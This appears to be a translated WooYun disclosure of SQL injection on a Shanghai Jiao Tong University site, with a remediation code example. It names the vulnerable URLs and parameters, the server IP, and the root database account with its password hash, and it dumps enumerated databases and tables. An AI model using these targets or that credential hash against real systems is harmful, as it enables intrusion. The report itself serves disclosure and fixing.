
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-093819

Title: A Shanghai Jiao Tong University site has multiple SQL injections, leaking over 300 tables

Vendor: sjtu.edu.cn

Author: Yang

Submitted: 2015-01-25 16:05

Fixed: 2015-03-11 16:06

Published: 2015-03-11 16:06

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure timeline:

2015-01-25: Details sent to the vendor, awaiting vendor response
2015-01-25: Vendor confirmed; details visible to the vendor only
2015-02-04: Details disclosed to core white hats and domain experts
2015-02-14: Details disclosed to regular white hats
2015-02-24: Details disclosed to intern white hats
2015-03-11: Details disclosed to the public

Brief description:

This shouldn't be a duplicate, right?
And if it isn't a duplicate, can it make the front page?

Details:

Vulnerable site: http://envir.sjtu.edu.cn/
Vulnerable URL: http://envir.sjtu.edu.cn/TeachandStudy/FosterList.php?num=4&cnum=49&ID=49

[Screenshot: 1.png]


Target: 		http://envir.sjtu.edu.cn/DetailDownLoadInfo.php?num=60&cnum=201&ID=1265
Host IP: 202.120.44.59
Web Server: Microsoft-IIS/7.5
Powered-by: PHP/5.3.10
Powered-by: ASP.NET
DB Server: MySQL >=5
Resp. Time(avg): 221 ms
Current User: root@localhost
DB User & Pass: root:*432ADA312C2AD598576DC0499CCC0BE0FC45FB9B:localhost
Current DB: environmentdb
Sql Version: 5.5.20
Compile OS: Win32
Host Name: Server-SESE
Installation dir: C:/Program Files (x86)/MySQL/MySQL Server 5.5/
System User: root@localhost
Data Bases: information_schema
drupal
empirecms
environmentdb
envphy
mysql
performance_schema
sesesite
tenth
test
yard
yard0
Current User: root@localhost
Current User: root@localhost
Current User: root@localhost


Lots and lots of users, all with passwords, but I don't know which system they belong to.

Proof of vulnerability:

I'll say nothing more.

back-end DBMS: MySQL 5.0.11
Database: environmentdb
[22 tables]
+----------------------------------------------+
| admin |
| columntype |
| eadmin |
| ecolumntype |
| eimagelink |
| einfo |
| emenu |
| eotherlink |
| eresume |
| erole |
| eroletomenu |
| eusertorole |
| ewebinfo |
| imagelink |
| info |
| menu |
| otherlink |
| resume |
| role |
| roletomenu |
| usertorole |
| webinfo |
+----------------------------------------------+
Database: empirecms
[171 tables]
+----------------------------------------------+
| phome_ecms_article |
| phome_ecms_article_data_1 |
| phome_ecms_article_doc |
| phome_ecms_article_doc_data |
| phome_ecms_download |
| phome_ecms_download_data_1 |
| phome_ecms_download_doc |
| phome_ecms_download_doc_data |
| phome_ecms_flash |
| phome_ecms_flash_data_1 |
| phome_ecms_flash_doc |
| phome_ecms_flash_doc_data |
| phome_ecms_info |
| phome_ecms_info_data_1 |
| phome_ecms_info_doc |
| phome_ecms_info_doc_data |
| phome_ecms_infoclass_article |
| phome_ecms_infoclass_download |
| phome_ecms_infoclass_flash |
| phome_ecms_infoclass_info |
| phome_ecms_infoclass_movie |
| phome_ecms_infoclass_news |
| phome_ecms_infoclass_photo |
| phome_ecms_infoclass_shop |
| phome_ecms_infotmp_article |
| phome_ecms_infotmp_download |
| phome_ecms_infotmp_flash |
| phome_ecms_infotmp_info |
| phome_ecms_infotmp_movie |
| phome_ecms_infotmp_news |
| phome_ecms_infotmp_photo |
| phome_ecms_infotmp_shop |
| phome_ecms_movie |
| phome_ecms_movie_data_1 |
| phome_ecms_movie_doc |
| phome_ecms_movie_doc_data |
| phome_ecms_news |
| phome_ecms_news_data_1 |
| phome_ecms_news_doc |
| phome_ecms_news_doc_data |
| phome_ecms_photo |
| phome_ecms_photo_data_1 |
| phome_ecms_photo_doc |
| phome_ecms_photo_doc_data |
| phome_ecms_shop |
| phome_ecms_shop_data_1 |
| phome_ecms_shop_doc |
| phome_ecms_shop_doc_data |
| phome_enewsad |
| phome_enewsadclass |
| phome_enewsadminstyle |
| phome_enewsbefrom |
| phome_enewsbq |
| phome_enewsbqclass |
| phome_enewsbqtemp |
| phome_enewsbqtemp_3 |
| phome_enewsbqtemp_4 |
| phome_enewsbqtempclass |
| phome_enewsbuybak |
| phome_enewsbuygroup |
| phome_enewscard |
| phome_enewschecktext |
| phome_enewsclass |
| phome_enewsclassadd |
| phome_enewsclasstemp |
| phome_enewsclasstemp_3 |
| phome_enewsclasstemp_4 |
| phome_enewsclasstempclass |
| phome_enewsdiggips |
| phome_enewsdo |
| phome_enewsdolog |
| phome_enewsdownerror |
| phome_enewsdownrecord |
| phome_enewsdownurlqz |
| phome_enewserrorclass |
| phome_enewsf |
| phome_enewsfava |
| phome_enewsfavaclass |
| phome_enewsfeedback |
| phome_enewsfeedbackclass |
| phome_enewsfeedbackf |
| phome_enewsfile |
| phome_enewsgbook |
| phome_enewsgbookclass |
| phome_enewsgfenip |
| phome_enewsgroup |
| phome_enewshy |
| phome_enewshyclass |
| phome_enewsinfoclass |
| phome_enewsinfotype |
| phome_enewsinfovote |
| phome_enewsjstemp |
| phome_enewsjstemp_3 |
| phome_enewsjstemp_4 |
| phome_enewsjstempclass |
| phome_enewskey |
| phome_enewslink |
| phome_enewslinkclass |
| phome_enewslinktmp |
| phome_enewslisttemp |
| phome_enewslisttemp_3 |
| phome_enewslisttemp_4 |
| phome_enewslisttempclass |
| phome_enewslog |
| phome_enewsloginfail |
| phome_enewsmember |
| phome_enewsmemberadd |
| phome_enewsmemberf |
| phome_enewsmemberfeedback |
| phome_enewsmemberform |
| phome_enewsmembergbook |
| phome_enewsmembergroup |
| phome_enewsmod |
| phome_enewsnewstemp |
| phome_enewsnewstemp_3 |
| phome_enewsnewstemp_4 |
| phome_enewsnewstempclass |
| phome_enewsnotcj |
| phome_enewspage |
| phome_enewspageclass |
| phome_enewspayapi |
| phome_enewspayrecord |
| phome_enewspic |
| phome_enewspicclass |
| phome_enewspl |
| phome_enewspl_data_1 |
| phome_enewsplayer |
| phome_enewsplf |
| phome_enewspltemp |
| phome_enewspltemp_3 |
| phome_enewspltemp_4 |
| phome_enewspostdata |
| phome_enewspublic |
| phome_enewspubtemp |
| phome_enewspubtemp_3 |
| phome_enewspubtemp_4 |
| phome_enewsqf |
| phome_enewsqmsg |
| phome_enewssearch |
| phome_enewssearchall |
| phome_enewssearchall_load |
| phome_enewssearchtemp |
| phome_enewssearchtemp_3 |
| phome_enewssearchtemp_4 |
| phome_enewssearchtempclass |
| phome_enewsshopdd |
| phome_enewsshoppayfs |
| phome_enewsshopps |
| phome_enewsspacestyle |
| phome_enewssql |
| phome_enewstable |
| phome_enewstask |
| phome_enewstempgroup |
| phome_enewstempvar |
| phome_enewstempvar_3 |
| phome_enewstempvar_4 |
| phome_enewstempvarclass |
| phome_enewstogzts |
| phome_enewsuser |
| phome_enewsuserjs |
| phome_enewsuserlist |
| phome_enewsvote |
| phome_enewsvotemod |
| phome_enewsvotetemp |
| phome_enewsvotetemp_3 |
| phome_enewsvotetemp_4 |
| phome_enewswapstyle |
| phome_enewswords |
| phome_enewswriter |
| phome_enewszt |
| phome_enewsztclass |
+----------------------------------------------+
Database: yard
[20 tables]
+----------------------------------------------+
| wp_awsomnews |
| wp_btev_events |
| wp_calendar |
| wp_comments |
| wp_downloads |
| wp_eventscalendar_main |
| wp_links |
| wp_options |
| wp_pollsa |
| wp_pollsip |
| wp_pollsq |
| wp_postmeta |
| wp_posts |
| wp_slim_countries |
| wp_slim_stats |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_terms |
| wp_usermeta |
| wp_users |
+----------------------------------------------+
Database: performance_schema
[17 tables]
+----------------------------------------------+
| cond_instances |
| events_waits_current |
| events_waits_history |
| events_waits_history_long |
| events_waits_summary_by_instance |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_global_by_event_name |
| file_instances |
| file_summary_by_event_name |
| file_summary_by_instance |
| mutex_instances |
| performance_timers |
| rwlock_instances |
| setup_consumers |
| setup_instruments |
| setup_timers |
| threads |
+----------------------------------------------+
Database: drupal
[64 tables]
+----------------------------------------------+
| access |
| accesslog |
| aggregator_category |
| aggregator_category_feed |
| aggregator_category_item |
| aggregator_feed |
| aggregator_item |
| authmap |
| blocks |
| book |
| boxes |
| cache |
| comments |
| directory |
| files |
| filter_formats |
| filters |
| flood |
| forum |
| history |
| img_assist_map |
| locales_meta |
| locales_source |
| locales_target |
| menu |
| moderation_filters |
| moderation_roles |
| moderation_votes |
| node |
| node_access |
| node_comment_statistics |
| node_counter |
| nodewords |
| permission |
| poll |
| poll_choices |
| profile_fields |
| profile_values |
| queue |
| role |
| scheduler |
| search_index |
| search_total |
| sequences |
| spam_comments |
| spam_custom |
| spam_nodes |
| spam_statistics |
| spam_tokens |
| system |
| term_data |
| term_hierarchy |
| term_node |
| term_relation |
| term_synonym |
| tinymce_role |
| tinymce_settings |
| url_alias |
| users |
| users_roles |
| variable |
| vocabulary |
| vocabulary_node_types |
| watchdog |
+----------------------------------------------+
Database: envphy
[13 tables]
+----------------------------------------------+
| sjtu_ad |
| sjtu_attachment |
| sjtu_blog |
| sjtu_comment |
| sjtu_link |
| sjtu_navi |
| sjtu_options |
| sjtu_reply |
| sjtu_sort |
| sjtu_tag |
| sjtu_tpl_options_data |
| sjtu_twitter |
| sjtu_user |
+----------------------------------------------+
Database: sesesite
[16 tables]
+----------------------------------------------+
| user |
| accessories |
| counter_area |
| counter_browser |
| counter_daily |
| counter_detail |
| counter_month |
| counter_year |
| emailpage |
| indexvisit |
| news |
| newspic |
| searchkw |
| sesefaculty |
| survey081120 |
| tag |
+----------------------------------------------+
Database: yard0
[32 tables]
+----------------------------------------------+
| owa_click |
| owa_configuration |
| owa_document |
| owa_exit |
| owa_feed_request |
| owa_host |
| owa_impression |
| owa_os |
| owa_referer |
| owa_request |
| owa_session |
| owa_site |
| owa_ua |
| owa_user |
| owa_visitor |
| wp_awsomnews |
| wp_calendar |
| wp_comments |
| wp_downloads |
| wp_eventscalendar_main |
| wp_links |
| wp_options |
| wp_pollsa |
| wp_pollsip |
| wp_pollsq |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_terms |
| wp_usermeta |
| wp_users |
+----------------------------------------------+
Database: mysql
[24 tables]
+----------------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+----------------------------------------------+
Database: tenth
[36 tables]
+----------------------------------------------+
| jos_banner |
| jos_bannerclient |
| jos_bannertrack |
| jos_categories |
| jos_components |
| jos_contact_details |
| jos_content |
| jos_content_frontpage |
| jos_content_rating |
| jos_core_acl_aro |
| jos_core_acl_aro_groups |
| jos_core_acl_aro_map |
| jos_core_acl_aro_sections |
| jos_core_acl_groups_aro_map |
| jos_core_log_items |
| jos_core_log_searches |
| jos_groups |
| jos_menu |
| jos_menu_types |
| jos_messages |
| jos_messages_cfg |
| jos_migration_backlinks |
| jos_modules |
| jos_modules_menu |
| jos_newsfeeds |
| jos_plugins |
| jos_poll_data |
| jos_poll_date |
| jos_poll_menu |
| jos_polls |
| jos_sections |
| jos_session |
| jos_stats_agents |
| jos_templates_menu |
| jos_users |
| jos_weblinks |
+----------------------------------------------+
Database: information_schema
[37 tables]
+----------------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+----------------------------------------------+
Database: envphy
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| sjtu_options | 61 |
| sjtu_blog | 12 |
| sjtu_navi | 7 |
| sjtu_tag | 6 |
| sjtu_ad | 1 |
| sjtu_link | 1 |
| sjtu_sort | 1 |
| sjtu_twitter | 1 |
| sjtu_user | 1 |
+---------------------------------------+---------+
Database: empirecms
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| phome_enewsf | 105 |
| phome_enewsdolog | 56 |
| phome_enewsbq | 26 |
| phome_enewslink | 14 |
| phome_enewsbqtemp_4 | 12 |
| phome_enewsmemberf | 12 |
| phome_enewsbqtemp | 10 |
| phome_enewsnewstemp_3 | 10 |
| phome_enewsnewstemp_4 | 10 |
| phome_enewsfeedbackf | 9 |
| phome_enewsnewstemp | 9 |
| phome_enewsbqtemp_3 | 8 |
| phome_enewslisttemp | 8 |
| phome_enewslisttemp_3 | 8 |
| phome_enewslisttemp_4 | 8 |
| phome_enewsmod | 8 |
| phome_enewstable | 8 |
| phome_enewsshoppayfs | 6 |
| phome_enewstempvar | 6 |
| phome_enewstempvar_4 | 6 |
| phome_enewsnotcj | 5 |
| phome_enewstempvar_3 | 5 |
| phome_enewsbqclass | 4 |
| phome_enewsmembergroup | 4 |
| phome_enewsplayer | 4 |
| phome_enewsshopps | 4 |
| phome_enewsclasstemp_3 | 3 |
| phome_enewspayapi | 3 |
| phome_enewstempgroup | 3 |
| phome_enewsclasstemp | 2 |
| phome_enewsclasstemp_4 | 2 |
| phome_enewsmemberform | 2 |
| phome_enewsspacestyle | 2 |
| phome_enewsvotetemp | 2 |
| phome_enewsvotetemp_3 | 2 |
| phome_enewsvotetemp_4 | 2 |
| phome_enewswapstyle | 2 |
| phome_enewsadclass | 1 |
| phome_enewsadminstyle | 1 |
| phome_enewsclass | 1 |
| phome_enewsclassadd | 1 |
| phome_enewsdo | 1 |
| phome_enewsfeedbackclass | 1 |
| phome_enewsgbookclass | 1 |
| phome_enewsgroup | 1 |
| phome_enewsjstemp | 1 |
| phome_enewsjstemp_3 | 1 |
| phome_enewsjstemp_4 | 1 |
| phome_enewslog | 1 |
| phome_enewspicclass | 1 |
| phome_enewspltemp | 1 |
| phome_enewspltemp_3 | 1 |
| phome_enewspltemp_4 | 1 |
| phome_enewspublic | 1 |
| phome_enewspubtemp | 1 |
| phome_enewspubtemp_3 | 1 |
| phome_enewssearchtemp | 1 |
| phome_enewsuser | 1 |
+---------------------------------------+---------+
Database: performance_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| setup_consumers | 8 |
| performance_timers | 5 |
| setup_timers | 1 |
+---------------------------------------+---------+
Database: drupal
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| search_index | 91880 |
| spam_comments | 17171 |
| term_node | 15839 |
| node_counter | 8535 |
| node_comment_statistics | 8534 |
| forum | 8523 |
| spam_nodes | 8522 |
| node | 8506 |
| watchdog | 2965 |
| locales_source | 2351 |
| locales_target | 2351 |
| accesslog | 1551 |
| spam_tokens | 624 |
| variable | 129 |
| system | 52 |
| menu | 26 |
| blocks | 19 |
| spam_statistics | 11 |
| files | 7 |
| sequences | 7 |
| term_hierarchy | 7 |
| vocabulary_node_types | 6 |
| filters | 5 |
| users_roles | 4 |
| filter_formats | 3 |
| permission | 3 |
| role | 3 |
| users | 3 |
| locales_meta | 2 |
| tinymce_role | 2 |
| tinymce_settings | 2 |
| vocabulary | 2 |
| node_access | 1 |
| poll | 1 |
+---------------------------------------+---------+
Database: environmentdb
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| info | 1124 |
| columntype | 119 |
| usertorole | 112 |
| einfo | 107 |
| eusertorole | 89 |
| admin | 81 |
| resume | 80 |
| eroletomenu | 74 |
| roletomenu | 74 |
| eresume | 73 |
| eadmin | 72 |
| ecolumntype | 72 |
| emenu | 14 |
| menu | 14 |
| erole | 8 |
| role | 8 |
| eimagelink | 5 |
| imagelink | 5 |
| ewebinfo | 1 |
| webinfo | 1 |
+---------------------------------------+---------+
Database: sesesite
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| counter_daily | 33096 |
| counter_detail | 29151 |
| counter_month | 1632 |
| indexvisit | 1620 |
| searchkw | 1192 |
| counter_area | 150 |
| counter_browser | 93 |
| counter_year | 72 |
| survey081120 | 51 |
| `user` | 1 |
| accessories | 1 |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| help_relation | 1028 |
| help_topic | 508 |
| help_keyword | 465 |
| help_category | 38 |
| `user` | 1 |
| proxies_priv | 1 |
+---------------------------------------+---------+
Database: tenth
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| jos_content | 53 |
| jos_modules | 39 |
| jos_components | 32 |
| jos_modules_menu | 32 |
| jos_plugins | 32 |
| jos_menu | 23 |
| jos_categories | 22 |
| jos_session | 15 |
| jos_newsfeeds | 14 |
| jos_poll_data | 12 |
| jos_poll_date | 12 |
| jos_core_acl_aro_groups | 11 |
| jos_content_frontpage | 8 |
| jos_menu_types | 4 |
| jos_sections | 4 |
| jos_groups | 3 |
| jos_core_acl_aro | 2 |
| jos_core_acl_groups_aro_map | 2 |
| jos_templates_menu | 2 |
| jos_users | 2 |
| jos_bannerclient | 1 |
| jos_contact_details | 1 |
| jos_content_rating | 1 |
| jos_core_acl_aro_sections | 1 |
| jos_polls | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 5155 |
| STATISTICS | 823 |
| TABLES | 452 |
| PARTITIONS | 396 |
| KEY_COLUMN_USAGE | 385 |
| TABLE_CONSTRAINTS | 332 |
| SESSION_VARIABLES | 327 |
| GLOBAL_VARIABLES | 316 |
| GLOBAL_STATUS | 310 |
| SESSION_STATUS | 310 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 195 |
| COLLATIONS | 195 |
| CHARACTER_SETS | 39 |
| USER_PRIVILEGES | 28 |
| PLUGINS | 20 |
| SCHEMATA | 12 |
| ENGINES | 9 |
| INNODB_CMP | 5 |
| INNODB_CMP_RESET | 5 |
| INNODB_CMPMEM | 5 |
| INNODB_CMPMEM_RESET | 5 |
| PROCESSLIST | 1 |
+---------------------------------------+---------+


Fix recommendation:

Filter input.
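The fix the reporter recommends, filtering input, shown as an added example that is not the reporter's code nor the site's (the page does not show the site's source): a hypothetical PHP handler for a page reached like FosterList.php, with the injectable string-concatenation pattern beside a hardened version that validates `ID` as a non-negative integer and passes it through a PDO prepared statement. The table name `info` is taken from the dump above, but its columns (`ID`, `title`), the DSN and the database account are assumptions.

```php
<?php
// Added example (not the site's or the reporter's code): the "filter input" fix
// for a page reached as FosterList.php?num=4&cnum=49&ID=49. Table `info` and
// columns `ID`, `title` are assumed; the DSN and account are placeholders.

// --- Vulnerable pattern, shown for contrast only ---------------------------
// The raw query-string value is pasted into the SQL text, so whatever follows
// the number becomes part of the statement. This is the shape of bug the
// scanner output above reports.
function vulnerableLookup(mysqli $db, array $get)
{
    $id = $get['ID'];                                   // untrusted, unvalidated
    return $db->query("SELECT ID, title FROM info WHERE ID = " . $id);
}

// --- Hardened version ------------------------------------------------------
// Step 1, validate: ID, num and cnum are numeric ids, so anything that is not
// a non-negative integer is rejected outright rather than "cleaned up".
function parseIntParam(array $get, $name)
{
    if (!isset($get[$name])) {
        return null;
    }
    // FILTER_VALIDATE_INT accepts only an optionally signed decimal integer;
    // "49abc", "4 9", "" and "49'" all fail. min_range refuses negative ids.
    $value = filter_var($get[$name], FILTER_VALIDATE_INT,
                        array('options' => array('min_range' => 0)));
    return $value === false ? null : $value;
}

// Step 2, parameterize: the value is bound to a placeholder, so the server
// receives it as data and never as SQL syntax.
function safeLookup(PDO $db, array $get)
{
    $id = parseIntParam($get, 'ID');
    if ($id === null) {
        return null;                                    // caller answers 400 Bad Request
    }
    $stmt = $db->prepare('SELECT ID, title FROM info WHERE ID = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

function connect()
{
    // Placeholder DSN and a dedicated read-only account. The scan above shows the
    // site connecting as root@localhost, which is why one injectable parameter
    // exposed every database on the server; an account limited to SELECT on
    // environmentdb bounds what a future bug can reach.
    return new PDO('mysql:host=127.0.0.1;dbname=environmentdb;charset=utf8',
                   'envir_web_ro', 'PLACEHOLDER_PASSWORD',
                   array(PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
                         PDO::ATTR_EMULATE_PREPARES => false));
}

// Constructed inputs: only the first survives validation; the others never
// reach the database.
var_dump(parseIntParam(array('ID' => '49'), 'ID'));
var_dump(parseIntParam(array('ID' => '49abc'), 'ID'));
var_dump(parseIntParam(array('ID' => "49'"), 'ID'));
```

Of the three constructed inputs, only `'49'` is returned (as the integer 49); `'49abc'` and `"49'"` yield null and no query is built for them. Validation and the prepared statement are two separate layers on purpose: the integer check gives a clean 400 for malformed ids, and the bound parameter makes the query safe even for parameters that legitimately carry free text. The separate low-privilege account addresses what made this finding severe, since the scan output shows the application running as root@localhost, so a single injectable parameter reached all eleven databases on the server.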

Copyright notice: when reposting, please credit the source: Yang@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 16

Confirmed: 2015-01-25 20:12

Vendor reply:

Thank you, we will deal with it immediately!

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2015-02-02 14:54 | 计算姬 ( Regular white hat | Rank: 398 | Vulnerabilities: 90 | Look at me, look at me, look at me )

    Question for the reporter: is this a big vendor?

  2. 2015-02-02 15:55 | Yang ( Regular white hat | Rank: 247 | Vulnerabilities: 86 | As a newbie, what do I do if my Dami phone got smashed? )

    @计算姬 It was filed under the small-vendor track.